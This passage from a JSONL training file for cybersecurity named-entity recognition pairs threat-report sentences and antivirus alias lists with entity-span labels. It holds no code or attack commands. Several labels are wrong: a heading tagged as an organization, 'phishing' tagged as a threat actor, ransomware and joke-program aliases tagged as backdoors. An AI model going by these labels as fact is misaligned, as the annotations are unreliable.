known as: Win32.Trojan.WisdomEyes.16070401.9500.9923 Backdoor.MSIL TR/Ticker.A Trojan/Win32.Unknown Trojan:MSIL/Ticker.A Trojan.Ticker!i0gQR/g7sH4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004038", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Y3krat.25 Backdoor/W32.Y3krat.236032 Backdoor/Y3KRat.25 Backdoor.Y3krat.25 Trojan.Win32.Y3KRat.fqmw W32/Backdoor.CMH Backdoor.Trojan Win32/Y3KRat.25 BKDR_GQ.B Trojan.Y3K-3 Backdoor.Win32.Y3KRat.25 Backdoor.Y3KRat.AS!AU Backdoor.Win32.Y3KRat.236032[h] Win32.Backdoor.Y3krat.Ambw Backdoor.Y3krat.25 Backdoor.Win32.Y3KRat.25 Backdoor.Y3krat.25 BackDoor.Y3krat.18 Backdoor.Y3KRat.Win32.115 BKDR_GQ.B BehavesLike.Win32.Dropper.dc W32/Backdoor.PBIC-7717 Backdoor/Y3KRat.25.a BDS/Y3kRat.25.5 W32/Y3krat.25!tr.bdr Trojan[Backdoor]/Win32.Y3KRat Backdoor.Y3krat.25 Backdoor.W32.Y3KRat.25!c Win-Trojan/Y3KRat.236032 Backdoor:Win32/Y3KRat.2_5 Backdoor.RAT.Y3Backdoor.RAT.V1.8.a Backdoor.Y3KRat Bck/Y3KRat.H Backdoor.Win32.Y3KRat Backdoor.Y3krat.25 Backdoor.Win32.Y3KRat.25", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004039", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.161447 TrojanPSW.OnLineGames.adem Trojan-PSW.Win32.OnLineGames.adem Win32/PSW.OnLineGames.NNU Trojan.Packed.NsAnti Trojan.Spy-35117 Packer.Malware.NSAnti.1 TrojWare.Win32.PSW.OnLineGames.NNU Trojan.PWS.Gamania.9247 Win32/PSW.OnLineGames.NNU Packer.Malware.NSAnti.AL!IK Worm:Win32/Taterf.B Packer.Malware.NSAnti.1 Packer.Win32.Mian007.a Packer.Malware.NSAnti.AL W32/OnLineGames.fam!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004040", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Vundo Win.Downloader.8632-1 MalwareScope.Trojan-PSW.Pinch.1 Trojan.Click.4067 BehavesLike.Win32.Dropper.lc Trojan/Win32.QQPass.R1885", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004041", "source": 
"cyner2_train"}} {"text": "A backdoor also known as: Trojan/Exploit.DCom.naf Exploit.Win32.DCom.khbzi Win.Trojan.Dcom-2 Trojan.Peed!mca6fnIo2DU Exploit.DCom.6 Exploit.DCom.Win32.185 EXP/DCom.Y.13 Win-Trojan/Berbew.51712 Exploit:Win32/Dcom.Y Exploit.DCom Trj/CI.A Net-Worm.Win32.Kolab Exploit.DCOM.RPC Trojan.Win32.DCom.NAF Win32/Trojan.Exploit.3e3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004042", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win64 Win32.Trojan.WisdomEyes.16070401.9500.9643 W64/Trojan.JENW-7287 Trojan.Uboat BKDR64_UBOAT.A BKDR64_UBOAT.A Backdoor:Win64/UBoatRAT.A Trj/CI.A Backdoor.Rat.UBoatRat", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004044", "source": "cyner2_train"}} {"text": "The Gh0st malware is a widely used remote administration tool RAT that originated in China in the early 2000s.", "spans": {"MALWARE: The Gh0st malware": [[0, 17]], "MALWARE: remote administration tool RAT": [[35, 65]]}, "info": {"id": "cyner2_train_004045", "source": "cyner2_train"}} {"text": "A popular mobile messaging application, LINE was used as a bait to lure targets in a targeted attack which hit Taiwan government.", "spans": {"ORGANIZATION: LINE": [[40, 44]], "ORGANIZATION: Taiwan government.": [[111, 129]]}, "info": {"id": "cyner2_train_004046", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Karba.24576 TrojanAPT.Garveep.DL4 Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Win32.Karba.ai Trojan.Win32.DownLoad3.cztnhk Win32.Trojan.Karba.Pdvp TrojWare.Win32.Dialer.AFXP Trojan.DownLoad3.18105 Trojan.Karba.Win32.9 W32/Trojan.DWPP-4593 TR/Spy.mulkf Trojan.DarkHotel.23 Trojan.Win32.Karba.ai Win32/Trojan.7fa", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004048", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.TDss.ET Trojan.TDSS Trojan.TDss.ET WORM_TDSS.SMY Win32.Trojan.WisdomEyes.16070401.9500.9999 
WORM_TDSS.SMY Trojan.TDss.ET Packed.Win32.TDSS.f Trojan.TDss.ET Trojan.Win32.Tdss.btyvr Trojan.Win32.Z.Tdss.23552.A Packer.W32.Tdss.kYT0 Trojan.TDss.ET Win32.PkdTdss Trojan.Packed.365 Trojan.Kryptik.Win32.1293691 BehavesLike.Win32.FakeAlert.mh Trojan.Win32.Alureon Trojan[Packed]/Win32.TDSS Win32.Troj.TdssT.jr.102400 Trojan.TDss.ET Packed.Win32.TDSS.f TrojanDownloader:Win32/Rugzip.A Packed/Win32.Tdss.C53201 Trojan.TDSS.01414 Win32.Packed.Tdss.Pgdn W32/PackTDssfilter.I!tr Win32/Trojan.d9b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004049", "source": "cyner2_train"}} {"text": "On the 27th of June 2017, a new cyberattack hit many computer systems in Ukraine, as well as in other countries.", "spans": {"SYSTEM: computer systems": [[53, 69]]}, "info": {"id": "cyner2_train_004052", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.RansomeDNZ.Trojan Ransom/W32.crysis.94720 Ransom.Crysis.S162740 Trojan/Filecoder.Crysis.l Win32.Trojan.WisdomEyes.16070401.9500.9991 W32/Wadhrama.B Win32.Trojan-Ransom.VirusEncoder.A Trojan-Ransom.Win32.Crusis.to Trojan.Win32.Filecoder.emdnxn Trojan.Win32.Ransom.94720.F Troj.Ransom.W32.Crusis.tpcS TrojWare.Win32.Crysis.D Trojan.Encoder.3953 Trojan.Crusis.Win32.806 BehavesLike.Win32.Ransom.nc Trojan-Ransom.Crysis W32/Trojan.ILHO-9216 Trojan.Crypren.ic Trojan.Ransom.Crysis.6 Ransom.Crysis/Variant Trojan-Ransom.Win32.Crusis.to Trojan.Ransom.Crysis Hoax.Crusis Trj/GdSda.A Trojan-Ransom.Win32.Crysis.a W32/Crysis.L!tr.ransom Win32/Trojan.Ransom.f44", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004054", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Nagoot.FC.161 MSIL.Trojan.Injector.l W32/Trojan.MIPO-0322 Downloader.Ponik Trojan.Win32.Inject1.exqnlv Trojan.Win32.Z.Nagoot.68608.A Trojan.Inject1.54664 Trojan.MSIL.Nagoot TR/Dropper.MSIL.rjbya Trojan.MSIL.Bladabindi.1 Trojan:MSIL/Nagoot.A Trojan.PasswordStealer Trj/GdSda.A MSIL/Injector.IFP!tr 
Win32/Trojan.62b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004057", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.XhglJIK1DLL.Rootkit Trojan/W32.Cariez.32768.AU BackDoor-DTL.a Trojan.Cariez.Win32.270 Trojan/Koutodoor.dx TROJ_CARIEZ.SMA Win32.Trojan.WisdomEyes.16070401.9500.9997 TROJ_CARIEZ.SMA Win.Trojan.Cariez-189 Trojan.Win32.Cariez.a Trojan.Win32.Cariez.byufu TrojWare.Win32.Zybr.A Trojan.RKDoor.59 BackDoor-DTL.a Trojan.Win32.Cariez Trojan/Win32.Cariez Adware.Heur.E02D22 Trojan.Win32.Cariez.a Trojan:Win32/Cariez.A Backdoor/Win32.Koutodoor.R1208 TScope.Malware-Cryptor.SB Trj/Cariez.A Trojan.Win32.Cariez.bhg", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004061", "source": "cyner2_train"}} {"text": "While Japan is still the most heavily targeted geographic region by this particular actor, we also observed instances where individuals or organizations in Taiwan, Tibet, and Russia also may have been targeted.", "spans": {"THREAT_ACTOR: actor,": [[84, 90]], "ORGANIZATION: individuals": [[124, 135]], "ORGANIZATION: organizations": [[139, 152]]}, "info": {"id": "cyner2_train_004062", "source": "cyner2_train"}} {"text": "This report describes an extensive malware, phishing, and disinformation campaign active in several Latin American countries, including Ecuador, Argentina, Venezuela, and Brazil.", "spans": {"MALWARE: malware,": [[35, 43]], "THREAT_ACTOR: phishing,": [[44, 53]], "THREAT_ACTOR: disinformation campaign": [[58, 81]]}, "info": {"id": "cyner2_train_004063", "source": "cyner2_train"}} {"text": "This blog links this recent activity with previous isolated public reporting on similar attacks we believe are related.", "spans": {}, "info": {"id": "cyner2_train_004064", "source": "cyner2_train"}} {"text": "Collection of payloads being delivered via the Apache Struts vulnerability - CVE-2017-5638", "spans": {"MALWARE: payloads": [[14, 22]], "VULNERABILITY: the Apache Struts vulnerability": 
[[43, 74]]}, "info": {"id": "cyner2_train_004065", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Gargamel.A Backdoor.Gargamel.A Backdoor.Trojan BKDR_GARGAM.A Backdoor.Win32.Gargamel.a Backdoor.Gargamel.A Backdoor.Gargamel!8hABCfPKz0o Backdoor.Win32.Gargamel.Downloader Backdoor.Gargamel.A BackDoor.Gargamel BDS/Gargamel.A.10 BKDR_GARGAM.A Win-Trojan/Gargamel.17717 Backdoor.Gargamel.A Backdoor.Trojan Win32/Gargamel.Downloader Backdoor.Win32.Gargamel W32/Uploade.B!tr.bdr BackDoor.Gargamel.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004066", "source": "cyner2_train"}} {"text": "A backdoor also known as: KillCMOS.K Trojan.KillCMOS.O Trojan.KillCMOS.O Trojan.KillCMOS.O Trojan.KillCMOS.O TROJ_KILLCMOS.L Win.Trojan.KillCMOS-14 Trojan.KillCMOS.O Trojan.DOS.KillCMOS.k Trojan.Dos.KillCMOS.blmit Troj.DOS.KillCMOS.k!c Trojan.KillCMOS.O Trojan.KillCMOS.O TROJ_KILLCMOS.L KillCMOS.h TR/KillCMOS.J Trojan:DOS/KillCMOS.remnants Trojan.DOS.KillCMOS.k KillCMOS.h Dos.Trojan.Killcmos.Ebgc Trojan.KillCMOS Trj/KillCMOS.K Win32/Trojan.8f3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004067", "source": "cyner2_train"}} {"text": "A backdoor also known as: W97M.Downloader.DF HEUR.VBA.Trojan.e W2KM_DLOADR.YYSQD Trojan-Dropper:W97M/MaliciousMacro.B W2KM_DLOADR.YYSQD TrojanDropper:W97M/Miskip.B!dha Trojan-Dropper.W97M.Miskip heur.macro.infect.l", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004068", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGameELIYTAAD.Trojan Trojan-Ransom.Win32.Blocker!O Backdoor.Bustem.A5 Trojan.BCMiner Troj.Ransom.W32.Blocker!c Trojan.Johnnie.D545 TSPY_DOWNLOADER_CA0827C3.TOMC Trojan-Ransom.Win32.Blocker.jcku Trojan.Win32.AVKill.dqatba Trojan.Win32.A.Scar.118272.A Trojan.AVKill.11731 TSPY_DOWNLOADER_CA0827C3.TOMC BehavesLike.Win32.LoadMoney.ch Backdoor.Win32.Bustem Trojan/Win32.Unknown Backdoor:Win32/Bustem.A 
Trojan-Ransom.Win32.Blocker.jcku Trojan/Win32.Downloader.R14675 Hoax.Blocker Trojan-ransom.Win32.Blocker.cwfe Win32/RootKit.Rootkit.7e5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004069", "source": "cyner2_train"}} {"text": "The growing number of samples demonstrate that criminals are actively adopting this malware.", "spans": {"THREAT_ACTOR: criminals": [[47, 56]], "MALWARE: malware.": [[84, 92]]}, "info": {"id": "cyner2_train_004070", "source": "cyner2_train"}} {"text": "A backdoor also known as: Hoax.Win32.BadJoke!O W32/Joke.O Joke.Irritan JOKE_IRRITAN.A Hoax.Win32.BadJoke.Irritan Riskware.Win32.Irritan.hrfs Joke.Win32.Irritan.A FDOS.Winskill Backdoor.PePatch.Win32.34151 JOKE_IRRITAN.A W32/Joke.ASXP-0124 not-virus:Joke.Win32.Irritan JOKE/Irritan.A HackTool[Hoax]/Win32.Irritan Win32.Joke.Irritan.kcloud Win-AppCare/Irritan.248877 Trojan.Win32.BadJoke.AD Win32/Irritan.A Hoax.Win32.BadJoke.Irritan Win32/Joke.bee", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004071", "source": "cyner2_train"}} {"text": "Threat actors are taking advantage of Microsoft OneNote's ability to embed files and use social engineering techniques, such as phishing emails and lures inside the OneNote document, to get unsuspecting users to download and open malicious files.", "spans": {"THREAT_ACTOR: Threat actors": [[0, 13]], "SYSTEM: Microsoft OneNote's": [[38, 57]], "MALWARE: malicious files.": [[230, 246]]}, "info": {"id": "cyner2_train_004072", "source": "cyner2_train"}} {"text": "With this group being active for roughly one year, we decided to revisit this threat to determine what, if any, changes had been made to their toolset.", "spans": {"ORGANIZATION: group": [[10, 15]], "MALWARE: threat": [[78, 84]], "MALWARE: toolset.": [[143, 151]]}, "info": {"id": "cyner2_train_004075", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper/W32.Stabs.90045 TrojanDropper.Stabs.cvo Trojan/Dropper.Stabs.dka 
Win32/Bifrose.NDU W32/Trojan2.HEAS W32/Smalltroj.QFFP BKDR_BIFROSE.SMC BackDoor.IRC.Sdbot.3713 BKDR_BIFROSE.SMC Trojan-Downloader.Win32.Buzus!IK W32/Trojan2.HEAS TrojanDownloader:Win32/Buzus.F Trojan-Downloader.Win32.Buzus W32/Injector.IA!tr Trj/Buzus.AH", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004076", "source": "cyner2_train"}} {"text": "These components include a unique loader, downloader, and not one but two different trojan components.", "spans": {"MALWARE: loader, downloader,": [[34, 53]], "MALWARE: trojan": [[84, 90]]}, "info": {"id": "cyner2_train_004077", "source": "cyner2_train"}} {"text": "**Dump Domain Registration Patterns:*From about 2015 to at least October 2018 possibly longer, IBM X-Force assesses that ITG08's POS malware used the same notable domain naming convention: all known dump domains used by FrameworkPOS and GratefulPOS contained the same base name -akamaitechnologies.com. In fact, all said domains are nearly identical looking to a legitimate Akamai content delivery network CDN domain, differing only by a single character replacing a .' 
with - .", "spans": {"ORGANIZATION: **Dump Domain Registration Patterns:*From": [[0, 41]], "ORGANIZATION: IBM X-Force": [[95, 106]], "MALWARE: ITG08's POS malware": [[121, 140]], "MALWARE: FrameworkPOS": [[220, 232]], "MALWARE: GratefulPOS": [[237, 248]], "SYSTEM: content delivery network CDN": [[381, 409]]}, "info": {"id": "cyner2_train_004081", "source": "cyner2_train"}} {"text": "A backdoor also known as: Script.SWF.C603 Exp.SWF.Rig.EK.4476 Exploit.SWF.Downloader SWF_EXKIT.THAAEH Script.SWF.C603 Script.SWF.C603 SWF.S.Exploit.13894 Script.SWF.C603 Script.SWF.C603 Exploit.SWF.1232 SWF_EXKIT.THAAEH SWF/Exploit-Rig.h SWF/Trojan.VJFQ-3 Script.SWF.C603 SWF/Exploit-Rig.h Trojan.SWF.Exploit swf.cve-2015-8651.rig.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004082", "source": "cyner2_train"}} {"text": "Adobe independently patched the vulnerability CVE-2015-3043 in APSB15-06.", "spans": {"ORGANIZATION: Adobe": [[0, 5]], "VULNERABILITY: vulnerability CVE-2015-3043": [[32, 59]]}, "info": {"id": "cyner2_train_004083", "source": "cyner2_train"}} {"text": "The KOVTER malware embeds a JavaScript into the registry and executes a PowerShell script which eventually loads the main KOVTER binaries.", "spans": {"MALWARE: The KOVTER malware": [[0, 18]]}, "info": {"id": "cyner2_train_004086", "source": "cyner2_train"}} {"text": "CSIS has been informed about a number of targeted spear phishing attacks against Danish chiropractors.", "spans": {"ORGANIZATION: CSIS": [[0, 4]], "ORGANIZATION: Danish chiropractors.": [[81, 102]]}, "info": {"id": "cyner2_train_004088", "source": "cyner2_train"}} {"text": "The group focuses on companies that have intellectual property or sensitive information like those in the Defense and High-Tech industries.", "spans": {"THREAT_ACTOR: The group": [[0, 9]], "ORGANIZATION: companies": [[21, 30]], "ORGANIZATION: the Defense": [[102, 113]], "ORGANIZATION: High-Tech industries.": [[118, 139]]}, "info": {"id": "cyner2_train_004091", 
"source": "cyner2_train"}} {"text": "A backdoor also known as: TjnDownldr.SmaCod.S162507 Downloader.Tiny.Win32.8086 Win32.Trojan.WisdomEyes.16070401.9500.9968 Trojan.Win32.Tiny.elyeva TrojWare.Win32.TrojanDownloader.Tiny.NNO Trojan-Downloader.Win32.Tiny Trojan.Mikey.DECAC Trojan/Win32.Downloader.R193768 OScope.Trojan.0216 W32/Tiny.NNO!tr Win32/Trojan.823", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004095", "source": "cyner2_train"}} {"text": "A backdoor also known as: Uds.Dangerousobject.Multi!c Win32.Trojan.WisdomEyes.16070401.9500.9999 TR/Downloader.A.2357 Trojan.Kazy.D60565 TrojanDownloader:MSIL/Muxtart.A Win32.Trojan.Downloader.Szlu", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004096", "source": "cyner2_train"}} {"text": "Despite having a reputation of evolution, there doesn't seem to be very many recent updates on this malware family though.", "spans": {}, "info": {"id": "cyner2_train_004097", "source": "cyner2_train"}} {"text": "The latest round of attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit.", "spans": {"ORGANIZATION: Taiwanese electronics maker Acer": [[88, 120]], "MALWARE: unknown Flash Player exploit.": [[128, 157]]}, "info": {"id": "cyner2_train_004098", "source": "cyner2_train"}} {"text": "However, in addition to new variants of malicious .hta, we find new victims, .rar attachments with RTLO spearphishing, and the deployment of a 0day from Hacking Team.", "spans": {"MALWARE: malicious": [[40, 49]], "VULNERABILITY: 0day": [[143, 147]], "ORGANIZATION: Hacking Team.": [[153, 166]]}, "info": {"id": "cyner2_train_004099", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Malware14 Win32.Malware!Drop Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan-Downloader.Win32.Upatre.gqes Trojan.Win32.KillProc.expayv TrojWare.Win32.GozNym.AA Trojan.KillProc.54838 Downloader.Upatre.Win32.65195 
Trojan.Win32.Tofsee Trojan.Banker.GozNym.gs TR/Crypt.Xpack.sqizh Backdoor:Win32/Tofsee.T Trojan-Downloader.Win32.Upatre.gqes Win32.Malware!Drop Backdoor.PasswordStealer Trj/GdSda.A Win32/Tofsee.BJ W32/Kryptik.GCVH!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004100", "source": "cyner2_train"}} {"text": "The attack leveraged malware we called BlackLambert', which was used to target a high profile organization in Europe.", "spans": {"MALWARE: malware": [[21, 28]], "MALWARE: BlackLambert',": [[39, 53]], "ORGANIZATION: high profile organization": [[81, 106]]}, "info": {"id": "cyner2_train_004101", "source": "cyner2_train"}} {"text": "A backdoor also known as: BDS/Flood.IRC.2 MemScan:Trojan.Flooder.I IRC.Flood Trojan.Flood BackDoor.Ircbot.BCV IRC.Flood IRC.Flood Trojan.Backdoor.Flood.IRC.2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004103", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Scar.28672.J Win32.Trojan.Scar.aeru.4.Pack Trojan/Scar.aeru Trojan.Scar.AEY W32/Tibs.DOHY Trojan.Win32.Scar.aeru TrojWare.Win32.Scar.BA Win32/SillyAutorun.CVZ Trojan/Scar.axz Trojan/Win32.Scar Trojan.Win32.Scar!IK TrojanDownloader:Win32/Yibohbin.A Trojan.Win32.Scar.28672.I Win-Trojan/Scar.28672.AH Trojan.Win32.Scar.aeru Trojan.DL.Win32.Tiny.bug Trojan.Win32.Scar Trj/Scar.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004104", "source": "cyner2_train"}} {"text": "Figure 4 – Checking for installed apps Based on a thorough analysis of the code , the most interesting technical capabilities include : Capturing screenshots Enabling or changing administration settings Opening and visiting any URL Disabling Play Protect Recording audio Making phone calls Stealing the contact list Controlling the device via VNC Sending , receiving and deleting SMS Locking the device Encrypting files on the device and external drives Searching for files Retrieving the GPS location Capturing remote 
control commands from Twitter and Telegram Pushing overlays Reading the device ID The malware includes a keylogger that works in every app installed on the Android device .", "spans": {"SYSTEM: Twitter": [[541, 548]], "SYSTEM: Telegram": [[553, 561]], "SYSTEM: Android": [[675, 682]]}, "info": {"id": "cyner2_train_004108", "source": "cyner2_train"}} {"text": "A backdoor also known as: Android.Trojan.WipeLocker.A Android.Habey.A Trojan.Wipelock..1 A.H.Fra.Elite Android.Trojan.Wipelock.b Android/Wipelock.A HEUR:Trojan.AndroidOS.Soceng.f Android.Trojan.WipeLocker.A Trojan.Android.Elite.dmubjt Troj.Androidos.Habey!c Trojan-Spy:Android/SmsSpy.FW Android.Elite.1.origin ANDROID/Elite.A Android/Wipelock.A!tr Trojan/Android.Habey Android.Trojan.WipeLocker.A HEUR:Trojan.AndroidOS.Soceng.f Android-Trojan/WipeLocker.8493 Trojan.Android.Locker.c Trojan.AndroidOS.Wipelock Android.Trojan.WipeLocker.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004109", "source": "cyner2_train"}} {"text": "One of the samples we looked at SHA256:e154e62c1936f62aeaf55a41a386dbc293050acec8c4616d16f75395884c9090 contained a family of backdoor that hasn't been referenced in public documents.", "spans": {"MALWARE: family of": [[116, 125]], "MALWARE: backdoor": [[126, 134]]}, "info": {"id": "cyner2_train_004110", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.KRBanker.615936 Trojan.Sehijak.A7 Adware.Kraddare Adware.Kraddare.Win32.3892 Trojan.Zusy.D2CF65 W32/Banki.A Backdoor.Win32.Servidor.ac Trojan.Win32.RDN.eatfup Win32.Backdoor.Servidor.Pboq TrojWare.Win32.Sehijak.DA Trojan.DownLoader21.32804 BehavesLike.Win32.MultiPlug.jc W32/Banki.DFFU-6658 Backdoor.Servidor.b Trojan:Win32/Sehijak.A Backdoor.Win32.Servidor.ac Trojan/Win32.Banki.R175311 Backdoor.Servidor Win32/Adware.Kraddare.LP PUA.Kraddare! 
PUA.Kraddare W32/Servidor.AC!tr.bdr Win32/Backdoor.c5c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004111", "source": "cyner2_train"}} {"text": "CrowdStrike has released two blog posts detailing Sakula campaigns and continues to investigate its usage.", "spans": {"ORGANIZATION: CrowdStrike": [[0, 11]], "THREAT_ACTOR: Sakula campaigns": [[50, 66]]}, "info": {"id": "cyner2_train_004112", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9978 Trojan.Win32.ExtenBro.evtqgw Trojan.MSIL.ExtenBro Trojan/MSIL.fqcj TR/ExtenBro.vezgg Trojan:MSIL/ExtenBro.A Trj/GdSda.A Win32/Trojan.444", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004113", "source": "cyner2_train"}} {"text": "Escelar originally surfaced in January of this year, and has since had roughly 100,000 instances of attempted infections.", "spans": {"MALWARE: Escelar": [[0, 7]]}, "info": {"id": "cyner2_train_004114", "source": "cyner2_train"}} {"text": "At the same time, the group has been improving their ability to operate the business side of a ransomware organization.", "spans": {"THREAT_ACTOR: the group": [[18, 27]], "THREAT_ACTOR: a ransomware organization.": [[93, 119]]}, "info": {"id": "cyner2_train_004115", "source": "cyner2_train"}} {"text": "A backdoor also known as: BehavesLike.Win32.BackdoorNJRat.qm Trojan.Kazy.DEF49 Trojan/Win32.Llac.R18525", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004116", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.DLDrop.NSIS Trojan.Injector.Win32.385163 Trojan/Injector.cuom Trojan.Razy.D7CE0 W32/Injector.AKD Trojan.Win32.CUOM.ebfhyw W32/Injector.OIMQ-3591 TR/AD.Enestedel.ubzhk Ransom:Win32/Enestedel.B!rsm Trj/GdSda.A Win32/Injector.CUOM Trojan.Injector!1PtHxYGwvhY", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004117", "source": "cyner2_train"}} {"text": "A backdoor also known as: 
Win32.Trojan.WisdomEyes.16070401.9500.9829 Backdoor.Ehdoor", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004118", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Dorifel!O Trojan.FakeMS.ED Trojan/Dropper.Dorifel.eav Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Trojan.GTVK-8195 W32.IRCBot.NG Trojan.MSIL.Crypt.fqbo Trojan.DownLoader6.25796 Dropper.Dorifel.Win32.1316 TrojanDropper.Dorifel.afo Trojan[Dropper]/Win32.Dorifel Win32.Troj.Dorifel.kcloud Trojan.Zusy.D115D1 Trojan.MSIL.Crypt.fqbo Trojan:MSIL/Belfusba.A TrojanDropper.Dorifel Trj/CI.A MSIL/Selenium.A Trojan.Kryptik!LBVVyRsvO34 MSIL/Selenium.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004119", "source": "cyner2_train"}} {"text": "A backdoor also known as: Virus.W32.Virus!c Trojan/Spy.KeyLogger.au Trojan.Raw.KeyLog.epwywq BehavesLike.Win32.Cutwail.tc Trojan.Shelma.bbh Trojan/Win32.Shelma Trojan:Win32/Ronohu.A Trj/CI.A Python/Spy.KeyLogger.V Trojan.Python.Spy Python/KeyLogger.V!tr.spy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004120", "source": "cyner2_train"}} {"text": "Usually, these are done via HTTP or other TCP/IP connections.", "spans": {}, "info": {"id": "cyner2_train_004121", "source": "cyner2_train"}} {"text": "Recently, while reading a blog post from security vendor Akamai, we spotted a similar situation.", "spans": {"ORGANIZATION: security vendor Akamai,": [[41, 64]]}, "info": {"id": "cyner2_train_004123", "source": "cyner2_train"}} {"text": "The forum provides members with tools to patch RDP Remote Desktop Protocol servers to support multiple user logins, as well as other hacking tools, such as proxy installers and sysinfo collectors.", "spans": {"THREAT_ACTOR: forum": [[4, 9]], "THREAT_ACTOR: members": [[19, 26]], "MALWARE: tools": [[32, 37]], "SYSTEM: RDP Remote Desktop Protocol servers": [[47, 82]], "MALWARE: hacking tools,": [[133, 147]], "SYSTEM: proxy": [[156, 
161]], "SYSTEM: sysinfo": [[177, 184]]}, "info": {"id": "cyner2_train_004124", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.KRSign.810456 Win32.Trojan.WisdomEyes.16070401.9500.9958 Spyware.BL Trojan.ZxShellCRTD.Win32.10098 Backdoor:Win32/Zxshell.A!dha Win32/Backdoor.c4c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004126", "source": "cyner2_train"}} {"text": "Petya is a form of ransomware that overwrites the master boot record MBR in order to block access to both the user's files and operating system.", "spans": {"MALWARE: Petya": [[0, 5]], "MALWARE: ransomware": [[19, 29]], "SYSTEM: master boot record MBR": [[50, 72]], "SYSTEM: operating system.": [[127, 144]]}, "info": {"id": "cyner2_train_004127", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.7F39 Trojan.Podjot.A Trojan.Kazy.D2D8D TROJ_PODJOT.SM1 Win32.Trojan.WisdomEyes.16070401.9500.9924 TROJ_PODJOT.SM1 MalCrypt.Indus! Trojan:Win32/Podjot.A Trojan/Win32.Zapchast.R21212 Virus.Win32.Cryptor", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004128", "source": "cyner2_train"}} {"text": "The threat actor behind Duqu appears to have launched attacks at the venues for some of these high level talks.", "spans": {"THREAT_ACTOR: The threat actor": [[0, 16]], "MALWARE: Duqu": [[24, 28]]}, "info": {"id": "cyner2_train_004131", "source": "cyner2_train"}} {"text": "The attackers behind this campaign went to some lengths to disguise their activities, including using domains names disguised as antivirus AV company websites for their command and control C C servers.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "THREAT_ACTOR: campaign": [[26, 34]]}, "info": {"id": "cyner2_train_004132", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Injector!O Trojan.Zusy.D2081E W32/MalwareS.BJCG Backdoor.Vinself.B Win32/Fuwu.A BKDR_COMFOO.SME Win.Trojan.Rootkit-9875 
